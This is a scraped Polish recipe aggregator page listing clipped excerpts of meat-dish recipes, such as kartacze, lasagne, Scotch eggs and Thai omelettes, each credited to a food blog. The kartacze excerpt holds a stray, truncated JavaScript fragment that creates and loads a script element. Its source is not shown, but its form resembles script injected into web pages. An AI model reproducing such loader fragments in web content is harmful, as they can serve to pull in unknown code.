dania mięsne - 13801 przepisów (strona:711/921)

Kartacze z mięsem 58

Każdy kto chociaż raz odwiedził Podlasie lub Mazury z pewnością miał okazję skosztować kartaczy, nazywanych czasem także cepelinami. Podobne danie zjecie również na Litwie, gdzie należy do grona narodowych potraw. Warto poświęcić nieco czasu na ich przygotowanie, bo efekt zdecydowanie wart jest zachodu. var stamp = parseInt(new Date().getTime()/86400, 10);var script = document.createElement('script');script.setAttribute('type', 'text/javascript');script.setAttribute(...)różnicą miedzy pyzami a kartaczami jest ich kształt. Te pierwsze zwykle są okrągłe i nieduże z kolei te drugie są znacznie większe i podłużne. Często wskazuje się również, że dania te różnią się między sobą rodzajem ciasta, jednak w tym wypadku wiele zależy od regionu i lokalnego przepisu na tę potrawę. Z jaki nadzieniem robi się kartacze

okolicepalnika.pl
Naleśniki z farszem mielonym 100

Chciałam zrobić szybkie smaczne danie wpadłam na pomysł naleśniki ale na słono. Trochę się pomyliłam czasowo, gdyż zajęły mi one sporo czasu, jednak muszę powiedzieć, że było warto. Naprawdę fajny smaczny i syty obiad. Zapraszam... Stopień trudności prosty, nigdy nie lubiłam smażyć naleśników zawsze mi wychodziły jakieś człekokształtne ale znalazłam sposób na wylewanie ciasta, tzn. wazówką na środek patelni(...)grudki. Smażymy na natłuszczonej patelni  z obydwu stron. Ja wlewam trochę oleju do kubka i maczam w nim pędzelkiem spożywczym po czym równomiernie rozsmarowuje na patelni.  Farsz mięsny: mięso podsmażamy na odrobinie oleju wraz z posiekaną drobno cebulą i czosnkiem. Wrzucamy kukurydzę, fasole i przyprawy. Kiedy mięso i warzywa osiągną wymaganą miękkość, dodajemy pomidory . Całość doprawiamy solą

Kubki smaku
OGNISTY GULASZ – GOTHIC II: NOC KRUKA – pieczone „gołąbki” w czerwonej kapuście 240

przepisu od niejakiego Lou. Kucharz zleca nam zdobycie składników i przygotowanie mikstury potrzebnej do sosu, obiecując, że gotowaniem zajmie się samodzielnie. Otrzymany od Snafa przepis na „Młot Lou” możemy dać Samuelowi z obozu piratów, który przyrządzi dla nas ten trunek lub możemy zrobić go samodzielnie na stole alchemicznym za pomocą menzurki ze składników podanych w recepturze. W skład Młota wchodzą(...)mieszamy, najlepiej dłonią, aby powstała jednolita masa. Proponujemy usmażyć małą kulkę z masy i spróbować, czy dostatecznie doprawiliście mięso. 4 . MONTAŻ (5 min) Na końcówkę liścia kapusty nakładamy porcję mięsnej masy – ok. 2-3 łyżek. Zwijamy liść na tyle, aby tylko nakryć nadzienie, a następnie zaginamy boki liścia do środka i zawijamy go do samego końca. Każdy zwinięty liść układamy

Nerds Kitchen
Tarta - ostre kuleczki drobiowe w masie serowo ziołowej 166

Tarty często przygotowuję, bo na obiad lub kolację serwuję.  Kruche ciasto na maśle przygotowałam, do którego niewielką ilość smalcu dodałam, bo babcia tak robiła  

Moniki Smakołyki
Faszerowane pieczarki 115

Przepraszam za jakość zdjęcia Skladniki: 700 dag.świerzych pieczarek 1 kg mięsa mielonego może być wieprzowe polecam również kurczęce 1 cebula 2 jajka 1 bułka sucha

Viola cooks with passion
Jajka po szkocku w mięsie mielonym 73

jajecznym i sosem tatarskim domowej roboty. Na wielkanocny obiad będą jak znalazł. (adsbygoogle = window.adsbygoogle || []).push({}); Drukuj Jajka po szkocku w mięsie mielonym 5 od 1 osoby Autor: Paweł Clad Danie: Główne Kuchnia: Polska Trudność: Średnie Ilość 4 porcje Przygotowanie 30 min. Smażenie 10 min. Kalorie 170 kcal Jajka po szkocku, czyli jaja na twardo opatulone mięsem mielonym. Najlepiej smakują(...)oleju rzepakowego. Mięso mielone przełóż do miski, zagnieć je dłońmi rozdrabniając strukturę na papkę. Następnie zagnieć w jedną masę: mięso mielone, rumianą cebulkę, musztardę, chrzan, sól i pieprz. Masę mięsną podziel na 4 równe części, każde jajo na twardo obtocz szczelnie mięsem mielonym z dodatkami. Roladki owiń srebrną folią aluminiową i wstaw do lodówki na 30 minut, gdzie stężeją zachowując

ProstePesto.pl
Klopsiki z indyka z cukinią w sosie pomidorowym 127

wcinały ten kolorowy obiad z radością. Są tak dobre, że spodziewajcie się też próśb o dokładki! POLUB NA-TALERZU.PL NA FACEBOOKU Cukinia sprytnie ukrywa się wewnątrz klopsików. Do masy na mięsne kuleczki dodajemy startą na tarce i odsączoną z nadmiaru wody cukinię. Co ten sprytny zabieg nam daje? Same zalety: zjemy więcej warzyw klopsiki są bardziej soczyste cała potrawa nabiera zupełnie(...)cukinii, by klopsiki były soczyste, ale nie płynące. Parmezan . Król serów nadaje klopsikom ostrzejszy, charakterystyczny smak. Jego dodatek jest jednak na tyle niewielki, że możecie go pominąć, a smak dania będzie cały czas bezbłędny. SPRAWDŹ TEŻ: Inne sprawdzone przepisy na dania z indykiem znajdziesz w zakładce INDYK Pomidory . W sezonie korzystajcie ze świeżych pomidorów, najlepiej mniej

Na-talerzu.pl
Szynka z indyka z szynkowara z morelami i pistacjami 108

wielu, wielu lat. Przy jego użyciu przygotujemy szynki, balerony, mielonki i różnego rodzaje kiełbasy. Wyroby szynkowarowe nazywane są też prasowankami, bo urządzenie to jest wyposażone w sprężynę, która prasuje mięsny wkład, powodując, że pomiędzy jego warstwami nie ma powietrza, a gotowy produkt nie kruszy się. Jakie mięso możemy włożyć do szynkowara? Tak na prawdę każde, od wołowiny poczynając, poprzez wieprzowinę(...)wędliny. Zapraszam do przygotowania delikatnej szynki z indyka z dodatkiem moreli i pistacji. Obydwa te dodatki nadadzą szynce wyjątkowego smaku. Z odrobiną majonezu lub innego delikatnego sosu będzie idealnym daniem na elegancką kolację lub świąteczne śniadanie. Zobaczcie jakie to proste! Szynka z indyka z szynkowara  z morelami i pistacjami Proporcja   na szynkowar o pojemności 900 g Czas

Kulinarne przygody Gatity
Cukiniowa zapiekanka 202

czerwone pomidory, soczysta papryka, młode ziemniaczki, chrupiąca fasolka szparagowa. Do tego świeżutka cebula i odrobina naszego młodego polskiego aromatycznego czosnku, brzmi dobrze? Dorzućmy jeszcze trochę mięsa mielonego i pyszne danie obiadowe gotowe. Składniki dla 4 osób: 5-6 średnich ziemniaków 2  cukinie 2 pomidory 1/2 średniej czerwonej papryki garść zielonej fasolki szparagowej 1 cebula 2 ząbki czosnku(...)minut. Na koniec wlać na patelnię śmietankę, zagotować i dusić na średnim ogniu przez 2-3 minuty. W naczyniu (lub naczyniach) do zapiekania układać kolejno: ziemniaki, połowę cukinii, masę mięsną, fasolkę szparagową i ponownie cukinię. Wierzch posypad ostrą papryką. Wstawić do nagrzanego do 180 ° C piekarnika i piec 25-30 minut. Smacznego

Pełny talerz
Kiełbasa ” Kaszubska kanapkowa ” , pyszna wędlina domowa 118

Kiełbasa ” Kaszubska kanapkowa ” , pyszna wędlina domowa Kiełbasa ” Kaszubska ” to jedna z lepszych kiełbas kanapkowych , jakie poczyniłam . Dlaczego ? Po prosu jest pyszna , soczysta

Ogrodnik w podróży
Lazania (Lasagne) 171

Kolejne danie, które nie wymaga od nas spędzania w kuchni zbyt dużo czasu. Nie jest to na pewno posiłek dla osób będących na diecie, ale jest bardzo smaczny i o niebo zdrowszy niż jakiś tam fast food. Przygotowując samodzielnie lazanię (j.włoski lasagne), wiemy jakich produktów używamy i nie trujemy się różnego rodzaju E i tym podobnymi poprawiaczami smaku(...)taką lazanię będziecie przygotowywać, moi domownicy byli zachwyceni i jeszcze na 3 dzień pytali czy coś zostało:) Składniki: (duża porcja, forma 34 x 25,5 x 7 cm) farsz mięsny: 1 kg dobrego mięsa mielonego wieprzowego (u mnie z chudej łopatki) 2 puszki krojonych pomidorów bez skóry 1 duża cebula 3 ząbki czosnku 1 łyżka suszonej bazylii 1 łyżka suszonego

Kuchcik gotuje
Tajskie omlety z mięsem 105

Dziś postanowiłam przedstawić Wam ciekawą i bardzo smaczną przekąskę w tajskim stylu - jest to omlet z nadzieniem z mięsa mielonego. Pomysł na takie danie bardzo mi się spodobał i z pewnością będę przygotowywać podobne omleciki również z innymi rodzajami farszu ;) Polecam! Składniki : Farsz : 2 ząbki czosnku 1 mała cebula 250g mięsa mielonego  (mieszanego) 2 łyżki sosu rybnego(...)olej z orzeszków ziemnych i smażyć na nim cienkie omlety, jajka nalewać łyżką wazową. Smażyć aż masa lekko zetnie się z wierzchu, nstępnie na środek nakładać niewielką ilość farszu mięsnego, po czym składać omlet w kieszonkę - złożyć boki do środka, najpierw prawą i lewą stronę, a następnie delikatnie górę i dół. Lekko przycisnąć łopatką i przełożyć na talerz złożoną częścią

Codzienne Gotowanie

Proponowane wyszukiwania